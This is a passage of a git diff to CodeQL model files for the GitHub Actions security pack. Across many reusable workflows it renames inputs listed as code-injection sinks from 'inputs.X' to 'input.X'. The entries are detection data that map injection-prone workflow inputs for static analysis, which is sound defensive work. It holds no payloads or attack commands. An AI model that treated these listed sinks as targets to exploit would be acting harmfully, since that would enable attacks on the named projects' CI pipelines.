a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml index 1a7784c9f018..55888f485510 100644 --- a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["jetbrains/intellij-platform-gradle-plugin/.github/workflows/reusable-single-unitTest.yml", "*", "inputs.gradleVersion", "code-injection", "generated"] \ No newline at end of file + - ["jetbrains/intellij-platform-gradle-plugin/.github/workflows/reusable-single-unitTest.yml", "*", "input.gradleVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml index ffb7a7d7d107..ea453ec48112 100644 --- a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml @@ -3,11 +3,11 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "inputs.image", "code-injection", "generated"] - - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "inputs.variant", "code-injection", "generated"] - - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "inputs.platform", "code-injection", "generated"] - - ["jupyter/docker-stacks/.github/workflows/docker-merge-tags.yml", "*", "inputs.variant", "code-injection", "generated"] - - ["jupyter/docker-stacks/.github/workflows/docker-merge-tags.yml", "*", "inputs.image", "code-injection", "generated"] - - ["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "inputs.variant", "code-injection", "generated"] - - ["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "inputs.image", "code-injection", "generated"] - - ["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file + - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "input.image", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "input.variant", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "input.platform", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-merge-tags.yml", "*", "input.variant", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-merge-tags.yml", "*", "input.image", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "input.variant", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "input.image", "code-injection", "generated"] + - ["jupyter/docker-stacks/.github/workflows/docker-build-test-upload.yml", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml index 4ae93a83cd8f..39005b693e71 100644 --- a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml @@ -3,21 +3,21 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kairos-io/kairos/.github/workflows/reusable-zfs-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-upgrade-with-cli-test.yaml", "*", "inputs.flavor_release", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-upgrade-with-cli-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "inputs.family", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "inputs.flavor_release", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-qemu-reset-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.base_image", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.family", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.model", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.flavor_release", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.variant", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-qemu-bundles-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-qemu-acceptance-test.yaml", "*", "inputs.port", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-qemu-acceptance-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-provider-upgrade-latest-test.yaml", "*", "inputs.flavor_release", "code-injection", "generated"] - - ["kairos-io/kairos/.github/workflows/reusable-provider-upgrade-latest-test.yaml", "*", "inputs.flavor", "code-injection", "generated"] \ No newline at end of file + - ["kairos-io/kairos/.github/workflows/reusable-zfs-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-with-cli-test.yaml", "*", "input.flavor_release", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-with-cli-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "input.family", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "input.flavor_release", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-upgrade-latest-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-reset-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "input.base_image", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "input.family", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "input.model", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "input.flavor_release", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "input.variant", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-netboot-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-bundles-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-acceptance-test.yaml", "*", "input.port", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-qemu-acceptance-test.yaml", "*", "input.flavor", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-provider-upgrade-latest-test.yaml", "*", "input.flavor_release", "code-injection", "generated"] + - ["kairos-io/kairos/.github/workflows/reusable-provider-upgrade-latest-test.yaml", "*", "input.flavor", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml index a63ddd5da671..4b4850831911 100644 --- a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kanidm/kanidm/.github/workflows/kanidm_individual_book.yml", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file + - ["kanidm/kanidm/.github/workflows/kanidm_individual_book.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml index e73d0d81875b..f45709cfa0f4 100644 --- a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml @@ -3,18 +3,18 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kata-containers/kata-containers/.github/workflows/release-s390x.yaml", "*", "inputs.target-arch", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/release-ppc64le.yaml", "*", "inputs.target-arch", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/release-arm64.yaml", "*", "inputs.target-arch", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/release-amd64.yaml", "*", "inputs.target-arch", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "inputs.tag", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "inputs.repo", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "inputs.registry", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "inputs.tag", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "inputs.repo", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "inputs.registry", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", "inputs.tag", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", "inputs.repo", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", "inputs.registry", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-amd64.yaml", "*", "inputs.tag", "code-injection", "generated"] - - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-amd64.yaml", "*", "inputs.repo", "code-injection", "generated"] \ No newline at end of file + - ["kata-containers/kata-containers/.github/workflows/release-s390x.yaml", "*", "input.target-arch", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/release-ppc64le.yaml", "*", "input.target-arch", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/release-arm64.yaml", "*", "input.target-arch", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/release-amd64.yaml", "*", "input.target-arch", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "input.tag", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "input.repo", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-s390x.yaml", "*", "input.registry", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "input.tag", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "input.repo", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-ppc64le.yaml", "*", "input.registry", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", "input.tag", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", "input.repo", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-arm64.yaml", "*", "input.registry", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-amd64.yaml", "*", "input.tag", "code-injection", "generated"] + - ["kata-containers/kata-containers/.github/workflows/publish-kata-deploy-payload-amd64.yaml", "*", "input.repo", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml index 3a9119898744..1d8dc84c2f04 100644 --- a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml @@ -3,14 +3,14 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "inputs.build_mode", "code-injection", "generated"] - - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "inputs.release_branch", "code-injection", "generated"] - - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "inputs.images_tag", "code-injection", "generated"] - - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "inputs.quay_org", "code-injection", "generated"] - - ["kiali/kiali/.github/workflows/integration-tests-frontend.yml", "*", "inputs.istio_version", "code-injection", "generated"] - - ["kiali/kiali/.github/workflows/integration-tests-frontend-tempo.yml", "*", "inputs.istio_version", "code-injection", "generated"] - - ["kiali/kiali/.github/workflows/integration-tests-frontend-multicluster-primary-remote.yml", "*", "inputs.istio_version", "code-injection", "generated"] - - ["kiali/kiali/.github/workflows/integration-tests-frontend-multicluster-multi-primary.yml", "*", "inputs.istio_version", "code-injection", "generated"] - - ["kiali/kiali/.github/workflows/integration-tests-backend.yml", "*", "inputs.istio_version", "code-injection", "generated"] - - ["kiali/kiali/.github/workflows/integration-tests-backend-multicluster-external-controlplane.yml", "*", "inputs.istio_version", "code-injection", "generated"] - - ["kiali/kiali/.github/workflows/build-frontend.yml", "*", "inputs.target_branch", "code-injection", "generated"] \ No newline at end of file + - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.build_mode", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.release_branch", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.images_tag", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.quay_org", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-frontend.yml", "*", "input.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-frontend-tempo.yml", "*", "input.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-frontend-multicluster-primary-remote.yml", "*", "input.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-frontend-multicluster-multi-primary.yml", "*", "input.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-backend.yml", "*", "input.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/integration-tests-backend-multicluster-external-controlplane.yml", "*", "input.istio_version", "code-injection", "generated"] + - ["kiali/kiali/.github/workflows/build-frontend.yml", "*", "input.target_branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml index 3c525970eccd..f404aa73762f 100644 --- a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kotest/kotest/.github/workflows/run-gradle.yml", "*", "inputs.task", "code-injection", "generated"] \ No newline at end of file + - ["kotest/kotest/.github/workflows/run-gradle.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml index 187b3d2fd0a7..2f546ce3f577 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-k8s-e2e.yaml", "*", "inputs.k8s-version", "code-injection", "generated"] - - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-images.yaml", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file + - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-k8s-e2e.yaml", "*", "input.k8s-version", "code-injection", "generated"] + - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-images.yaml", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml index 3e11359c6b36..9e8b1e439939 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "inputs.image_tag", "code-injection", "generated"] - - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "inputs.image_name", "code-injection", "generated"] - - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "inputs.client", "code-injection", "generated"] - - ["kubescape/kubescape/.github/workflows/a-pr-scanner.yaml", "*", "inputs.UNIT_TESTS_PATH", "code-injection", "generated"] \ No newline at end of file + - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "input.image_tag", "code-injection", "generated"] + - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "input.image_name", "code-injection", "generated"] + - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "input.client", "code-injection", "generated"] + - ["kubescape/kubescape/.github/workflows/a-pr-scanner.yaml", "*", "input.UNIT_TESTS_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml index 819f9f0e35d8..20a24a4ec7f0 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "inputs.next-version", "code-injection", "generated"] - - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "inputs.release-branch", "code-injection", "generated"] + - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "code-injection", "generated"] + - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.release-branch", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all extensible: summaryModel diff --git a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml index 9f30976bbadc..666a86caf881 100644 --- a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "inputs.VERSION_NAME", "code-injection", "generated"] - - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "inputs.REGISTRY", "code-injection", "generated"] - - ["kumahq/kuma/.github/workflows/_test.yaml", "*", "inputs.FULL_MATRIX", "code-injection", "generated"] - - ["kumahq/kuma/.github/workflows/_e2e.yaml", "*", "inputs.matrix", "code-injection", "generated"] \ No newline at end of file + - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "input.VERSION_NAME", "code-injection", "generated"] + - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "input.REGISTRY", "code-injection", "generated"] + - ["kumahq/kuma/.github/workflows/_test.yaml", "*", "input.FULL_MATRIX", "code-injection", "generated"] + - ["kumahq/kuma/.github/workflows/_e2e.yaml", "*", "input.matrix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml index 81a419fec0d8..d4926952f1ad 100644 --- a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml @@ -3,13 +3,13 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["labring/sealos/.github/workflows/services.yml", "*", "inputs.push_image_tag", "code-injection", "generated"] - - ["labring/sealos/.github/workflows/services.yml", "*", "inputs.push_image", "code-injection", "generated"] - - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "inputs.build_from", "code-injection", "generated"] - - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "inputs.push_image_tag", "code-injection", "generated"] - - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "inputs.push_image", "code-injection", "generated"] - - ["labring/sealos/.github/workflows/import-patch-image.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["labring/sealos/.github/workflows/frontend.yml", "*", "inputs.push_image_tag", "code-injection", "generated"] - - ["labring/sealos/.github/workflows/frontend.yml", "*", "inputs.push_image", "code-injection", "generated"] - - ["labring/sealos/.github/workflows/controllers.yml", "*", "inputs.push_image_tag", "code-injection", "generated"] - - ["labring/sealos/.github/workflows/controllers.yml", "*", "inputs.push_image", "code-injection", "generated"] \ No newline at end of file + - ["labring/sealos/.github/workflows/services.yml", "*", "input.push_image_tag", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/services.yml", "*", "input.push_image", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "input.build_from", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "input.push_image_tag", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/objectstorage.yaml", "*", "input.push_image", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/import-patch-image.yml", "*", "input.arch", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/frontend.yml", "*", "input.push_image_tag", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/frontend.yml", "*", "input.push_image", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/controllers.yml", "*", "input.push_image_tag", "code-injection", "generated"] + - ["labring/sealos/.github/workflows/controllers.yml", "*", "input.push_image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml index 35fd748afbee..144c16ff8de2 100644 --- a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["laion-ai/open-assistant/.github/workflows/docker-build.yaml", "*", "inputs.context", "code-injection", "generated"] \ No newline at end of file + - ["laion-ai/open-assistant/.github/workflows/docker-build.yaml", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml index 192b1b608438..f97ee81bcb92 100644 --- a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "inputs.release_id", "code-injection", "generated"] - - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "inputs.filename", "code-injection", "generated"] - - ["learningequality/kolibri/.github/workflows/pypi_upload.yml", "*", "inputs.tar-file-name", "code-injection", "generated"] - - ["learningequality/kolibri/.github/workflows/pypi_upload.yml", "*", "inputs.whl-file-name", "code-injection", "generated"] \ No newline at end of file + - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "input.release_id", "code-injection", "generated"] + - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "input.filename", "code-injection", "generated"] + - ["learningequality/kolibri/.github/workflows/pypi_upload.yml", "*", "input.tar-file-name", "code-injection", "generated"] + - ["learningequality/kolibri/.github/workflows/pypi_upload.yml", "*", "input.whl-file-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml index 5a397f743a3c..401875059ec5 100644 --- a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["lensesio/stream-reactor/.github/workflows/build.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["lensesio/stream-reactor/.github/workflows/build.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml index 97f40ee7c07e..6d6f9e177402 100644 --- a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "inputs.directory", "code-injection", "generated"] - - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "inputs.cargo_make_task", "code-injection", "generated"] - - ["leptos-rs/leptos/.github/workflows/get-changed-examples-matrix.yml", "*", "inputs.example_changed", "code-injection", "generated"] \ No newline at end of file + - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "input.directory", "code-injection", "generated"] + - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "input.cargo_make_task", "code-injection", "generated"] + - ["leptos-rs/leptos/.github/workflows/get-changed-examples-matrix.yml", "*", "input.example_changed", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml index 293939322e2b..a4b2b55262ff 100644 --- a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "inputs.push_to_s3", "code-injection", "generated"] - - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "inputs.pl_version", "code-injection", "generated"] \ No newline at end of file + - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "input.push_to_s3", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "input.pl_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml index c3aa198743d5..dd3bfe71b7b1 100644 --- a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["liquibase/liquibase/.github/workflows/build-azure-uber-jar.yml", "*", "inputs.liquibase-version", "code-injection", "generated"] \ No newline at end of file + - ["liquibase/liquibase/.github/workflows/build-azure-uber-jar.yml", "*", "input.liquibase-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml index 1ea78b01cd6b..2207feeec224 100644 --- a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["litestar-org/litestar/.github/workflows/test.yml", "*", "inputs.python-version", "code-injection", 